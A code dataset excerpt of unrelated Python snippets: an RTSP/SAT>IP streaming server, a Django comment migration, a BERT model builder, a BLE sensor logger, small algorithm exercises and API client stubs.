for frontEnd in frontEndsDict:
if frontEndsDict[frontEnd]['freq'] == '':
# Start dvblast on specified freq
cmd = 'dvblast -a ' + frontEnd[-1] + ' -c dvb-t/pid' + chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0] + '.cfg -f ' + chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0] + ' -b 8 -C -u -r /tmp/dvblast' + chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0] + frontEnd + '.sock'
clientsDict[self.clientInfo['addr_IP']]['dvblastReload']= False
fLog.write('Info rtspServerWorker: Starting dvblast 3\n')
self.run_dvblast(cmd)
frontEndsDict[frontEnd]['freq'] = chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0]
frontEndsDict[frontEnd]['owner'] = self.clientInfo['addr_IP']
frontEndsDict[frontEnd]['numOwners'] = frontEndsDict[frontEnd]['numOwners'] + 1 # increase the number of owner
freqDict[frontEndsDict[frontEnd]['freq']] = frontEnd
clientsDict[self.clientInfo['addr_IP']]['ownerCapabilties'] = True
# print " frontEndsDict4", frontEndsDict
break
# Remove corresponding pid from config file and reload for sat>ip app
if clientsDict[self.clientInfo['addr_IP']]['stream'] and delPids and delPid:
try:
f = open('dvb-t/pid' + chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0] + '.cfg', 'r')
lines = f.readlines()
f.close()
f = open('dvb-t/pid' + chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0] + '.cfg', 'w')
lineToCompare = self.clientInfo['addr_IP']
for line in lines:
match_line = re.search(lineToCompare, line)
if not match_line:
f.write(line)
lineToGet = line.split('\t')
# print "Info rtspServerWorker: lineToGet", lineToGet
f.close()
cmd = 'dvblastctl -r /tmp/dvblast' + chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0] + freqDict[chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0]] + '.sock reload'
fLog.write('Info rtspServerWorker: Reloading dvblast configuration 3\n')
self.run_dvblast(cmd)
try:
# Update the number of owners of frontEnd
if (frontEndsDict[freqDict[chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0]]]['owner'] == '255.255.255.255' or frontEndsDict[freqDict[chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0]]]['owner'] == self.clientInfo['addr_IP']) and frontEndsDict[freqDict[chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0]]]['numOwners'] >= 1:
frontEndsDict[freqDict[chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0]]]['numOwners'] = frontEndsDict[freqDict[chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0]]]['numOwners'] - 1
clientsDict[self.clientInfo['addr_IP']]['ownerCapabilties'] = True # Make sure that the client has ownership capabilties
except:
print "Info rtspServerWorker: No adapters configured with that freq 3 "
try:
# If we have only one client connected left, then the last client takes the ownership of the tuner
if frontEndsDict[freqDict[chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0]]]['numOwners'] == 1 and frontEndsDict[freqDict[chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0]]]['owner'] == '255.255.255.255' :
frontEndsDict[freqDict[chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0]]]['owner'] = lineToGet[0][:-(len(clientsDict[self.clientInfo['addr_IP']]['rtpPort'])+1)] # The last client that will remain in the clientsDict has to take ownership (lineToGet[0] = ip_add:port_num)
# print " frontEndsDict8", frontEndsDict
except:
print "Info rtspServerWorker: No adapters configured with that freq 4 "
# print " frontEndsDict9", frontEndsDict
except:
# print "Info rtspServerWorker: Processing PLAY DELETE PIDS\n"
fLog.write("Info rtspServerWorker: Processing PLAY DELETE PIDS\n")
# Process TEARDOWN request
elif requestType == self.TEARDOWN:
# print "=========freqDict 1=======", freqDict
fLog.write("Info rtspServerWorker: Processing TEARDOWN, New State: INI\n")
try:
f = open('dvb-t/pid' + chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0] + '.cfg', 'r')
lines = f.readlines()
f.close()
f = open('dvb-t/pid' + chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0] + '.cfg', 'w')
lineToCompare = self.clientInfo['addr_IP']
for line in lines:
match_line = re.search(lineToCompare, line)
if not match_line:
f.write(line)
f.close()
cmd = 'dvblastctl -r /tmp/dvblast' + chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0] + freqDict[chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0]] + '.sock reload'
fLog.write('Info rtspServerWorker: Reloading dvblast configuration 4\n')
self.run_dvblast(cmd)
except:
# print "Info rtspServerWorker: processing TEARDOWN NONE\n"
# print " frontEndsDict7", frontEndsDict
fLog.write("Info rtspServerWorker: processing TEARDOWN NONE\n")
try:
# Update the number of owners of frontEnd
if frontEndsDict[freqDict[chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0]]]['numOwners'] >= 1:
frontEndsDict[freqDict[chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0]]]['numOwners'] = frontEndsDict[freqDict[chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0]]]['numOwners'] - 1
except:
print "Info rtspServerWorker: No adapters configured with that freq 1 "
try:
# If we have only one client connected left, then the last client takes the ownership of the tuner
if frontEndsDict[freqDict[chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0]]]['numOwners'] == 1:
if clientsDict.keys()[0] == self.clientInfo['addr_IP']:
frontEndsDict[freqDict[chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0]]]['owner'] = clientsDict.keys()[1] # The last client that will remain in the clientsDict has to take ownership
else:
frontEndsDict[freqDict[chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0]]]['owner'] = clientsDict.keys()[0] # The last client that will remain in the clientsDict has to take ownership
print " frontEndsDict6", frontEndsDict
except:
print "Info rtspServerWorker: No adapters configured with that freq 2 "
try:
# If we do not have anymore clients connected, then remove the entry from the freqDict
if frontEndsDict[freqDict[chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0]]]['numOwners'] == 0:
print "removed freqDict"
del freqDict[chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0]]
except:
fLog.write("Info rtspServerWorker: entry in the freqDict already removed\n")
# Get the session value before deleting the client entry, for replay purpose
# session = clientsDict[self.clientInfo['addr_IP']]['session']
# try:
# del freqDict[chList[clientsDict[self.clientInfo['addr_IP']]['freq']][0]]
# except:
# fLog.write("Info rtspServerWorker: entry in the freqDict already removed\n")
# Remove client from dictinary
# del clientsDict[self.clientInfo['addr_IP']]
# print "=========freqDict 2=======", freqDict
self.replyRtsp(self.OK_200_TEARDOWN, seq[1])
# Process OPTIONS request
elif requestType == self.OPTIONS:
fLog.write("Info rtspServerWorker: Processing OPTIONS\n")
self.replyRtsp(self.OK_200_OPTIONS, seq[1])
# Process DESCRIBE request
elif requestType == self.DESCRIBE:
if clientsDict[self.clientInfo['addr_IP']]['session'] == '':
fLog.write("Info rtspServerWorker: Processing DESCRIBE NONE\n")
self.replyRtsp(self.OK_404_DESCRIBE, seq[1])
else:
if clientsDict[self.clientInfo['addr_IP']]['dvblastReload']:
fLog.write("Info rtspServerWorker: Processing DESCRIBE SIGNAL\n")
self.replyRtsp(self.OK_200_DESCRIBE, seq[1])
else:
fLog.write("Info rtspServerWorker: Processing DESCRIBE NO SIGNAL\n")
self.replyRtsp(self.OK_200_DESCRIBE_NOSIGNAL, seq[1])
# Process CLOSE_CONNETION request
elif requestType == self.CLOSE_CONNETION:
fLog.write("Info rtspServerWorker: Processing CLOSE_CONNETION\n")
self.SERVER_RUNNING = 0
self.replyRtsp(self.CLOSING_CONNECTION, seq[1])
fLog.close()
def run_dvblast(self, cmd):
global fLog
proc = Popen([cmd], stdout=fLog, stderr=fLog, shell=True)
def updateChList(self):
global chList
# Get chList
chList = getChList()
def replyRtsp(self, code, seq):
"""Send RTSP reply to the client."""
# global session
global fLog
if code == self.OK_200_OPTIONS:
reply = 'RTSP/1.0 200 OK\r\nPublic:OPTIONS,SETUP,PLAY,TEARDOWN,DESCRIBE\r\nCSeq:1\r\n\r\n'
connSocket = self.clientInfo['rtspSocket']
connSocket.send(reply)
self.SERVER_RUNNING = 0
# Error messages
elif code == self.FILE_NOT_FOUND_404:
print "Info rtspServerWorker: 404 NOT FOUND\n"
fLog.write("Info rtspServerWorker: 404 NOT FOUND\n")
elif code == self.CON_ERR_500:
print "Info rtspServerWorker: 500 CONNECTION ERROR\n"
fLog.write("Info rtspServerWorker: 500 CONNECTION ERROR\n")
elif code == self.OK_200_DESCRIBE:
ipServer = getServerIP()
unicastIp = '0.0.0.0'
serverID = 1
serverTunerNr = len(frontEndsDict)
tunerValues = '1,123,1,3,'
tunerValues2 = ',' + clientsDict[self.clientInfo['addr_IP']]['pol'] + ',' + clientsDict[self.clientInfo['addr_IP']]['msys'] + ',' + clientsDict[self.clientInfo['addr_IP']]['mtype'] + ',' + clientsDict[self.clientInfo['addr_IP']]['plts'] + ',' + clientsDict[self.clientInfo['addr_IP']]['ro'] + ',' + clientsDict[self.clientInfo['addr_IP']]['sr'] + ',' + clientsDict[self.clientInfo['addr_IP']]['fec']
sdpString = 'v=0\r\no=- 534863118 534863118 IN IP4 %s\ns=SatIPServer:%d %d\r\nt=0 0\r\nm=video 0 RTP/AVP 33\r\nc=IN IP4 %s\na=control:stream=%d\na=fmtp:33 ver=1.0;scr=1;tuner=%s%s.00%s\na=%s\n' % (ipServer, serverID, serverTunerNr, unicastIp, clientsDict[self.clientInfo['addr_IP']]['stream'], tunerValues, clientsDict[self.clientInfo['addr_IP']]['freq'], tunerValues2, clientsDict[self.clientInfo['addr_IP']]['status'])
sdpLen = len(sdpString)
rtspString = 'RTSP/1.0 200 OK\r\nContent-length:%d\r\nContent-type:application/sdp\r\nContent-Base:rtsp://%s/\nCSeq:%s\nSession:%s\r\n\r\n' % (sdpLen, self.clientInfo['addr_IP'], seq, clientsDict[self.clientInfo['addr_IP']]['session'])
# Make the reply from the two parts: rtspString and sdpString
reply = rtspString + sdpString
connSocket = self.clientInfo['rtspSocket']
connSocket.send(reply)
self.SERVER_RUNNING = 0
fLog.write("Info rtspServerWorker: 200 DESCRIBE\n")
elif code == self.OK_200_DESCRIBE_NOSIGNAL:
ipServer = getServerIP()
unicastIp = '0.0.0.0'
serverID = 1
serverTunerNr = len(frontEndsDict)
tunerValues = '1,0,0,0,'
tunerValues2 = ',' + clientsDict[self.clientInfo['addr_IP']]['pol'] + ',' + clientsDict[self.clientInfo['addr_IP']]['msys'] + ',' + clientsDict[self.clientInfo['addr_IP']]['mtype'] + ',' + clientsDict[self.clientInfo['addr_IP']]['plts'] + ',' + clientsDict[self.clientInfo['addr_IP']]['ro'] + ',' + clientsDict[self.clientInfo['addr_IP']]['sr'] + ',' + clientsDict[self.clientInfo['addr_IP']]['fec']
sdpString = 'v=0\r\no=- 534863118 534863118 IN IP4 %s\ns=SatIPServer:%d %d\r\nt=0 0\r\nm=video 0 RTP/AVP 33\r\nc=IN IP4 %s\na=control:stream=%d\na=fmtp:33 ver=1.0;scr=1;tuner=%s%s.00%s\na=%s\n' % (ipServer, serverID, serverTunerNr, unicastIp, clientsDict[self.clientInfo['addr_IP']]['stream'], tunerValues, clientsDict[self.clientInfo['addr_IP']]['freq'], tunerValues2, clientsDict[self.clientInfo['addr_IP']]['status'])
sdpLen = len(sdpString)
rtspString = 'RTSP/1.0 200 OK\r\nContent-length:%d\r\nContent-type:application/sdp\r\nContent-Base:rtsp://%s/\nCSeq:%s\nSession:%s\r\n\r\n' % (sdpLen, self.clientInfo['addr_IP'], seq, clientsDict[self.clientInfo['addr_IP']]['session'])
# Make the reply from the two parts: rtspString and sdpString
reply = rtspString + sdpString
connSocket = self.clientInfo['rtspSocket']
connSocket.send(reply)
fLog.write("Info rtspServerWorker: 200 DESCRIBE NOSIGNAL\n")
self.SERVER_RUNNING = 0
elif code == self.OK_404_DESCRIBE:
reply = 'RTSP/1.0 404 Not Found\r\nCSeq:%s\n\r\n' % (seq)
connSocket = self.clientInfo['rtspSocket']
connSocket.send(reply)
fLog.write("Info rtspServerWorker: 404 DESCRIBE\n")
self.SERVER_RUNNING = 0
elif code == self.OK_200_SETUP:
reply = 'RTSP/1.0 200 OK\r\nSession:%s;timeout=30\r\ncom.ses.streamID:%d\r\nTransport: RTP/AVP;unicast;destination=%s;client_port=5004-5005\r\nCSeq:%s\n\r\n' % (clientsDict[self.clientInfo['addr_IP']]['session'], clientsDict[self.clientInfo['addr_IP']]['stream'], self.clientInfo['addr_IP'], seq)
connSocket = self.clientInfo['rtspSocket']
connSocket.send(reply)
fLog.write("Info rtspServerWorker: 200 SETUP\n")
self.SERVER_RUNNING = 0
elif code == self.OK_200_SETUP_PIDS:
reply = 'RTSP/1.0 200 OK\r\nSession:%s;timeout=30\r\ncom.ses.streamID:%d\r\nTransport: RTP/AVP;unicast;destination=%s;client_port=5004-5005\r\nCSeq:%s\r\n\r\n' % (clientsDict[self.clientInfo['addr_IP']]['session'], clientsDict[self.clientInfo['addr_IP']]['stream'], self.clientInfo['addr_IP'], seq)
connSocket = self.clientInfo['rtspSocket']
connSocket.send(reply)
fLog.write("Info rtspServerWorker: 200 SETUP PID\n")
self.SERVER_RUNNING = 1
elif code == self.OK_200_PLAY:
reply = 'RTSP/1.0 200 OK\r\nRTP-Info:url=//%s/stream=%d;seq=50230\r\nCSeq:%s\nSession:%s\r\n\r\n' % (self.clientInfo['addr_IP'], clientsDict[self.clientInfo['addr_IP']]['stream'], seq, clientsDict[self.clientInfo['addr_IP']]['session'])
connSocket = self.clientInfo['rtspSocket']
connSocket.send(reply)
fLog.write("Info rtspServerWorker: 200 PLAY\n")
self.SERVER_RUNNING = 0
elif code == self.OK_200_TEARDOWN:
reply = 'RTSP/1.0 200 OK\r\nContent-length:0\r\nCSeq:%s\nSession:%s\r\n\r\n' % (seq, clientsDict[self.clientInfo['addr_IP']]['session'])
connSocket = self.clientInfo['rtspSocket']
connSocket.send(reply)
# Remove client from dictinary
del clientsDict[self.clientInfo['addr_IP']]
fLog.write("Info rtspServerWorker: 200 TEARDOWN\n")
self.SERVER_RUNNING = 0
| StarcoderdataPython |
1612371 | from django.core.management.base import NoArgsCommand
from django.db import transaction, connection
from django.conf import settings
PATH_DIGITS = getattr(settings, 'COMMENT_PATH_DIGITS', 10)
SQL = """
INSERT INTO threadedcomments_comment (
comment_ptr_id,
parent_id,
last_child_id,
tree_path,
title
)
SELECT id as comment_ptr_id,
null as parent_id,
null as last_child_id,
(SELECT TO_CHAR(id, '%s')) AS tree_path,
''
FROM django_comments;
""" % ''.zfill(PATH_DIGITS)
class Command(NoArgsCommand):
help = "Migrates from django.contrib.comments to django-threadedcomments"
def handle(self, *args, **options):
transaction.commit_unless_managed()
transaction.enter_transaction_management()
transaction.managed(True)
cursor = connection.cursor()
cursor.execute(SQL)
transaction.commit()
transaction.leave_transaction_management()
| StarcoderdataPython |
174318 | import numpy as np
import tensorflow as tf
from tensorflow.keras.layers import Dense, Input
from tensorflow.keras.models import Model
def build_model(bert_layer, max_len=512):
input_word_ids = Input(shape=(max_len, ), dtype=tf.int32, name='input_word_ids')
input_mask = Input(shape=(max_len, ), dtype=tf.int32, name='input_mask')
segment_ids = Input(shape=(max_len, ), dtype=tf.int32, name='segment_ids')
_, sequence_output = bert_layer([input_word_ids, input_mask, segment_ids])
clf_output = sequence_output[:, 0, :]
model = Model(inputs=[input_word_ids, input_mask, segment_ids], outputs=clf_output)
return model
| StarcoderdataPython |
4815517 | <reponame>sergio-ivanuzzo/idewave-core<gh_stars>1-10
from struct import pack
from World.Object.Unit.Player.PlayerManager import PlayerManager
from World.WorldPacket.Constants.WorldOpCode import WorldOpCode
from Server.Connection.Connection import Connection
class Logout(object):
def __init__(self, **kwargs):
self.data = kwargs.pop('data', bytes())
self.connection: Connection = kwargs.pop('connection')
async def process(self) -> tuple:
with PlayerManager() as player_mgr:
player_mgr.set(self.connection.player).save()
response = pack(
'<IB',
0,
0
)
return WorldOpCode.SMSG_LOGOUT_RESPONSE, [response]
| StarcoderdataPython |
3366591 | #a
index=0
smallest=L[0]
for i in range(1,len(L)):
if L[i] < smallest:
smallest=L[i]
index = i
#b
def min_index(L: list) -> tuple:
""" (list) -> (object, int)
Return a tuple containing the smallest item from L and its index.
>>> min_index([4, 3, 2, 4, 3, 6, 1, 5])
(1, 6)
"""
index=0
smallest=L[0]
for i in range(1,len(L)):
if L[i] < smallest:
smallest=L[i]
index = i
return (smallest, index)
print(min_index([4, 3, 2, 4, 3, 6, 1, 5]))
#c
def min_or_max_index(L:list,P:bool) -> tuple:
if P == True :
index=0
smallest=L[0]
for i in range(1,len(L)):
if L[i] < smallest:
smallest=L[i]
index = i
return (smallest, index)
else :
index = 0
biggest = L[0]
for i in range(1,len(L)):
if L[i] > biggest:
biggest = L[i]
index = i
return (biggest, index)
print(min_or_max_index([4, 3, 2, 4, 3, 6, 1, 5],False))
| StarcoderdataPython |
1779154 | <reponame>Erebuxy/project_euler<filename>000-100/039/main.py
#!/usr/bin/env python3
import sys
import math
sys.path.insert(0, '../../')
import util
if __name__ == '__main__':
limit = 1000
max_count = 0
max_p = -1
for p in range(4, limit+1, 2):
count = 0
for i in range(int(p/3), math.ceil(p/2)):
for j in range(1, i):
k = p - i - j
if i**2 == j**2 + k**2:
count += 1
if count > max_count:
max_count = count
max_p = p
print(max_p)
| StarcoderdataPython |
1654168 | <gh_stars>0
class BankAccount:
account_number = 0
name = ""
balance_amount = 0
def account_creation(self):
self.account_number = int(input("Enter the account number\t"))
self.name = input("Enter the account holder name\t")
def amount_deposition(self, amount):
self.balance_amount = self.balance_amount + amount
def amount_withdrawn(self, amount):
if(amount<=self.balance_amount):
self.balance_amount = self.balance_amount - amount
else:
print("Less Ammount")
def display_account(self):
print("Name: ",self.name,"\tAccount Number: ",self.account_number,"\tBalance: ",self.balance_amount)
ch=''
acc=BankAccount()
while ch!=5:
print("\tMAIN MENU\t")
print("\t1. NEW ACCOUNT\t")
print("\t2. DEPOSIT AMOUNT\t")
print("\t3. WITHDRAW AMOUNT\t")
print("\t4. BALANCE ENQUIRY\t")
print("\t5. EXIT\t")
ch=int(input())
if ch==1:
acc.account_creation()
elif ch==2:
print("Test")
acc.amount_deposition(int(input()))
elif ch==3:
acc.amount_withdrawn(int(input()))
elif ch==4:
acc.display_account()
elif ch==5:
break
| StarcoderdataPython |
1774116 | #!/usr/bin/python
# -*- coding: utf-8 -*-
import pexpect
import time
from datetime import datetime
uuid_pre = "F000"
uuid_pos = "-0451-4000-B000-000000000000"
#format: handle = [data, config]
temp_uuid = ["AA01", "AA02"]
move_uuid = ["AA81", "AA82"]
humd_uuid = ["AA21", "AA22"]
baro_uuid = ["AA41", "AA42"]
opti_uuid = ["AA71", "AA72"]
leds_uuid = ["AA65", "AA66"]
sensor_mac = "B0:B4:48:C0:CA:03"
prompt = "\[CON\]\[" + sensor_mac + "\]\[LE\]>"
stealth_mode = False
active_sensors = [temp_uuid, move_uuid, humd_uuid, baro_uuid, opti_uuid]
sensor_uuid_to_cvh = {}
def log(data):
f = open("log.txt", "a")
f.write(data + "\n")
print data
f.close()
def turn_sensor_on(cnfg, hnd):
child.sendline("char-write-cmd " + sensor_uuid_to_cvh[uuid_pre + cnfg + uuid_pos] + " " + hnd)
child.expect(prompt)
def turn_sensor_off(cnfg, hnd):
child.sendline("char-write-cmd " + sensor_uuid_to_cvh[uuid_pre + cnfg + uuid_pos] + " " + hnd)
child.expect(prompt)
def read_sensor_data(data):
child.sendline("char-read-hnd " + sensor_uuid_to_cvh[uuid_pre + data + uuid_pos])
child.expect(prompt)
child.before
child.expect(prompt)
data = child.before
return data.strip().split(": ")[1]
def print_temp_data(value):
SCALE_LSB = 0.03125
value = value.split(" ")
obj_temp = "0x" + value[1] + value[0]
amb_temp = "0x" + value[3] + value[2]
obj_temp_cel = (float)(int(obj_temp, 16) >> 2) * SCALE_LSB
amb_temp_cel = (float)(int(amb_temp, 16) >> 2) * SCALE_LSB
obj_temp_fah = obj_temp_cel * (9.0/5.0) + 32.0
amb_temp_fah = amb_temp_cel * (9.0/5.0) + 32.0
log("IR TEMPERATURE")
log("\tOBJECT\t\t: " + str(obj_temp_cel) + "°C" + " | " + str(obj_temp_fah) + "°F")
log("\tAMBIENT\t\t: " + str(amb_temp_cel) + "°C" + " | " + str(amb_temp_fah) + "°F")
def print_move_data(value):
value = value.split(" ")
gyro_x = "0x" + value[1] + value[0]
gyro_y = "0x" + value[3] + value[2]
gyro_z = "0x" + value[5] + value[4]
acc_x = "0x" + value[7] + value[6]
acc_y = "0x" + value[9] + value[8]
acc_z = "0x" + value[11] + value[10]
mag_x = "0x" + value[13] + value[12]
mag_y = "0x" + value[15] + value[14]
mag_z = "0x" + value[17] + value[16]
gyro_x_dps = (((float)(int(gyro_x, 16))) * 1.0) / (65536.0 / 500.0)
gyro_y_dps = (((float)(int(gyro_y, 16))) * 1.0) / (65536.0 / 500.0)
gyro_z_dps = (((float)(int(gyro_z, 16))) * 1.0) / (65536.0 / 500.0)
acc_range = 16.0 # turning on handle to 0xffff sets to 16
acc_x_mps = (((float)(int(acc_x, 16))) * 1.0) / (32768.0 / acc_range)
acc_y_mps = (((float)(int(acc_y, 16))) * 1.0) / (32768.0 / acc_range)
acc_z_mps = (((float)(int(acc_z, 16))) * 1.0) / (32768.0 / acc_range)
mag_x_ut = ((float)(int(mag_x, 16))) * 1.0
mag_y_ut = ((float)(int(mag_y, 16))) * 1.0
mag_z_ut = ((float)(int(mag_z, 16))) * 1.0
log("MOVEMENT")
log("\tGYROSCOPE\t: " + "X: " + str(gyro_x_dps) + "°/s" + " | " + "Y: " + str(gyro_y_dps) + "°/s" + " | " + "Z: " + str(gyro_z_dps) + "°/s")
log("\tACCELEROMETER\t: " + "X: " + str(acc_x_mps) + "m/s" + " | " + "Y: " + str(acc_y_mps) + "m/s" + " | " + "Z: " + str(acc_z_mps) + "m/s")
log("\tMAGNETOMETER\t: " + "X: " + str(mag_x_ut) + "µT" + " | " + "Y: " + str(mag_y_ut) + "µT" + " | " + "Z: " + str(mag_z_ut) + "µT")
def print_humd_data(value):
value = value.split(" ")
temp = "0x" + value[1] + value[0]
humd = "0x" + value[3] + value[2]
temp_cel = ((float)(int(temp, 16))) / 65536.0 * 165.0 - 40.0
temp_fah = temp_cel * (9.0/5.0) + 32.0
humd_rel = (float)(int(humd, 16) & ~0x0003) / 65536.0 * 100.0
log("HUMIDITY")
log("\tTEMPERATURE\t: " + str(temp_cel) + "°C" + " | " + str(temp_fah) + "°F")
log("\tHUMDITY\t\t: " + str(humd_rel) + "%")
def print_baro_data(value):
value = value.split(" ")
temp = "0x" + value[2] + value[1] + value[0]
baro = "0x" + value[5] + value[4] + value[3]
temp_cel = ((float)(int(temp, 16))) / 100.0
temp_fah = temp_cel * (9.0/5.0) + 32.0
baro_hpa = ((float)(int(baro, 16))) / 100.0
baro_kpa = baro_hpa / 10.0
log("BAROMETER")
log("\tTEMPERATURE\t: " + str(temp_cel) + "°C" + " | " + str(temp_fah) + "°F")
log("\tPRESSURE\t: " + str(baro_kpa) + "kPa" + " | " + str(baro_hpa) + "hPa")
def print_opti_data(value):
value = value.split(" ")
opti = "0x" + value[1] + value[0]
m = int(opti, 16) & 0x0FFF
e = (int(opti, 16) & 0xF000) >> 12
if (e == 0):
e = 1
else:
e = 2 << (e - 1)
opti_lux = m * (0.01 * e)
log("OPTICAL")
log("\tLIGHT INTENSITY\t: " + str(opti_lux) + "lux")
def turn_sensors_on():
for sensor in active_sensors:
if sensor[1] == move_uuid[1]:
turn_sensor_on(sensor[1], "ffff")
else:
turn_sensor_on(sensor[1], "01")
def turn_sensors_off():
for sensor in active_sensors:
if sensor[1] == move_uuid[1]:
turn_sensor_off(sensor[1], "0000")
else:
turn_sensor_off(sensor[1], "00")
def init_led():
if not stealth_mode:
turn_sensor_on(leds_uuid[1], "01")
def set_led(hnd):
if not stealth_mode:
turn_sensor_on(leds_uuid[0], hnd)
child = pexpect.spawn("gatttool -I")
child.sendline("connect " + sensor_mac)
child.expect(prompt)
child.sendline("characteristics")
child.expect(prompt)
child.before
child.expect(prompt)
characteristics = child.before
handles = characteristics.split("\r\n")
for i in handles:
if len(i) >= 11:
handle = i.replace(":", ",").split(", ")
char_value_handle_value_index = handle.index("char value handle") + 1
uuid_value_index = handle.index("uuid") + 1
if handle[uuid_value_index] not in sensor_uuid_to_cvh:
sensor_uuid_to_cvh[handle[uuid_value_index].upper()] = handle[char_value_handle_value_index].upper()
init_led()
while (True):
set_led("03")
turn_sensors_on()
set_led("01")
time.sleep(10)
log("===")
log(str(datetime.now()))
set_led("02")
for sensor in active_sensors:
if sensor[0] == temp_uuid[0]:
print_temp_data(read_sensor_data(sensor[0]))
if sensor[0] == move_uuid[0]:
print_move_data(read_sensor_data(sensor[0]))
if sensor[0] == humd_uuid[0]:
print_humd_data(read_sensor_data(sensor[0]))
if sensor[0] == baro_uuid[0]:
print_baro_data(read_sensor_data(sensor[0]))
if sensor[0] == opti_uuid[0]:
print_opti_data(read_sensor_data(sensor[0]))
set_led("03")
turn_sensors_off()
log("===")
set_led("00")
time.sleep(590) | StarcoderdataPython |
182675 | <reponame>taddes/AlgoChallenge
def merge(left, right):
results = []
while(len(left) and len(right)):
if left[0] < right[0]:
results.append(left.pop(0))
print(left)
else:
results.append(right.pop(0))
print(right)
return [*results, *left, *right]
print(merge([3, 8, 12], [5, 10, 15]))
def merge_sort(arr):
if len(arr) == 1:
return arr
center = len(arr) // 2
print(center)
left = arr[0: center]
right = arr[center:]
print(left, right)
return merge(merge_sort(left), merge_sort(right))
print(merge_sort([22, 3, 15, 13, 822, 14, 15, 22, 75,])) | StarcoderdataPython |
10704 | <filename>ink2canvas/GradientHelper.py
from ink2canvas.lib.simpletransform import parseTransform
class GradientHelper(object):
def __init__(self, abstractShape):
self.abstractShape = abstractShape
def hasGradient(self, key):
style = self.abstractShape.getStyle()
if key in style:
styleParamater = style[key]
if styleParamater.startswith("url(#linear"):
return "linear"
if styleParamater.startswith("url(#radial"):
return "radial"
return None
def getGradientHref(self, key):
style = self.abstractShape.getStyle()
if key in style:
return style[key][5:-1]
return
def setGradientFill(self):
gradType = self.hasGradient("fill")
if (gradType):
gradient = self.setComponentGradient("fill", gradType)
self.abstractShape.canvasContext.setFill("gradient=grad")
if(self.hasGradientTransform(gradient)):
self.abstractShape.canvasContext.fill();
self.abstractShape.canvasContext.restore()
return True
def setGradientStroke(self):
gradType = self.hasGradient("stroke")
if (gradType):
gradient = self.setComponentGradient("stroke", gradType)
self.abstractShape.canvasContext.setStroke("gradient=grad")
if(self.hasGradientTransform(gradient)):
self.abstractShape.canvasContext.stroke();
self.abstractShape.canvasContext.restore()
return True
def hasGradientTransform(self, gradient):
return bool(gradient.attr("gradientTransform"))
def setGradientTransform(self, gradient):
dataString = gradient.attr("gradientTransform")
dataMatrix = parseTransform(dataString)
m11, m21, dx = dataMatrix[0]
m12, m22, dy = dataMatrix[1]
self.abstractShape.canvasContext.transform(m11, m12, m21, m22, dx, dy)
def setComponentGradient(self, key, gradType):
gradientId = self.getGradientHref(key)
if(gradType == "linear"):
gradient = self.abstractShape.rootTree.getLinearGradient(gradientId)
if(gradType == "radial"):
gradient = self.abstractShape.rootTree.getRadialGradient(gradientId)
if(gradient.link != None):
gradient.colorStops = self.abstractShape.rootTree.getLinearGradient(gradient.link).colorStops
if(self.hasGradientTransform(gradient)):
self.abstractShape.canvasContext.save()
self.setGradientTransform(gradient)
if(gradType == "linear"):
x1, y1, x2, y2 = gradient.getData()
self.abstractShape.canvasContext.createLinearGradient("grad", x1, y1, x2, y2)
if(gradType == "radial"):
cx, cy, fx, fy, r = gradient.getData()
self.abstractShape.canvasContext.createRadialGradient("grad", cx, cy, 0, fx, fy, r)
for stopKey, stopValue in gradient.colorStops.iteritems():
offset = float(stopKey)
color = self.abstractShape.canvasContext.getColor(stopValue.split(";")[0].split(":")[1] , stopValue.split(";")[1].split(":")[1] )
self.abstractShape.canvasContext.addColorStop("grad", offset, color)
return gradient
def createLinearGradient(self):
x1, y1, x2, y2 = self.gradient.getData()
self.abstractShape.canvasContext.createLinearGradient("grad", x1, y1, x2, y2)
for stop in self.gradient.stops:
color = self.canvasContext.getColor(stop.split(";")[0].split(":")[1] , stop.split(";")[1].split(":")[1])
offset = float(stop.split(";")[2].split(":")[1])
self.abstractShape.canvasContext.addColorStop("grad", offset, color) | StarcoderdataPython |
1616713 | <reponame>xRocketPowerx/python-sel-dedicated<filename>sel_dedicated/configuration.py
# coding: utf-8
"""
Seido User REST API
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
The version of the OpenAPI document: 2.4.8
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
from sel_dedicated_codegen.configuration import Configuration as _Base
class Configuration(_Base):
"""This class is wrapper for Configuration class
which auto generated by OpenAPI Generator
"""
def auth_settings(self):
"""Gets Auth Settings dict for api client.
:return: The Auth Settings information dict.
"""
return {
"X_Token_Auth": {
"in": "header",
"key": "X-Token",
"value": self.api_key["X-Token"]
},
}
| StarcoderdataPython |
27329 | <reponame>jeroenubbink/commercetools-python-sdk
# DO NOT EDIT! This file is automatically generated
import typing
from commercetools._schemas._shopping_list import (
ShoppingListDraftSchema,
ShoppingListPagedQueryResponseSchema,
ShoppingListSchema,
ShoppingListUpdateSchema,
)
from commercetools.helpers import RemoveEmptyValuesMixin
from commercetools.types._shopping_list import (
ShoppingList,
ShoppingListDraft,
ShoppingListPagedQueryResponse,
ShoppingListUpdate,
ShoppingListUpdateAction,
)
from commercetools.typing import OptionalListStr
from . import abstract, traits
class _ShoppingListQuerySchema(
traits.ExpandableSchema,
traits.SortableSchema,
traits.PagingSchema,
traits.QuerySchema,
